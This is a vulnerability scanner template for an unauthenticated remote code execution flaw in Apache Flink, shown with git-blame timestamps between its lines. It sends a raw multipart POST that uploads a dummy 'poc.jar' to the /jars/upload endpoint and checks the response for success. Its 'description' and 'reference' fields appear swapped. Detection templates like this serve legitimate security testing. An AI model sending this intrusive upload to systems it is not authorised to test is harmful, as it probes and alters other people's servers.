2021-02-10 15:18:24 +00:00
|
|
|
id: apache-flink-unauth-rce
|
|
|
|
|
|
|
|
info:
|
2022-05-23 21:29:29 +00:00
|
|
|
name: Apache Flink - Remote Code Execution
|
2021-02-10 15:18:24 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: critical
|
2022-05-23 21:29:29 +00:00
|
|
|
description: Apache Flink
|
|
|
|
reference: Apache Flink contains an unauthenticated remote code execution vulnerability.
|
2021-08-19 14:44:46 +00:00
|
|
|
- https://www.exploit-db.com/exploits/48978
|
|
|
|
- https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3
|
|
|
|
- https://github.com/LandGrey/flink-unauth-rce
|
2022-05-23 21:29:29 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
|
|
cvss-score: 10.0
|
|
|
|
cwe-id: CWE-77
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: apache,flink,rce,intrusive,unauth
|
2021-02-10 15:18:24 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /jars/upload HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3
|
|
|
|
|
|
|
|
--8ce4b16b22b58894aa86c421e8759df3
|
|
|
|
Content-Disposition: form-data; name="jarfile";filename="poc.jar"
|
|
|
|
Content-Type:application/octet-stream
|
|
|
|
|
2021-09-08 12:17:19 +00:00
|
|
|
{{randstr}}
|
2021-02-10 15:18:24 +00:00
|
|
|
--8ce4b16b22b58894aa86c421e8759df3--
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "application/json"
|
|
|
|
part: header
|
|
|
|
condition: and
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "success"
|
|
|
|
- "_poc.jar"
|
|
|
|
part: body
|
|
|
|
condition: and
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-05-23 21:29:29 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/23
|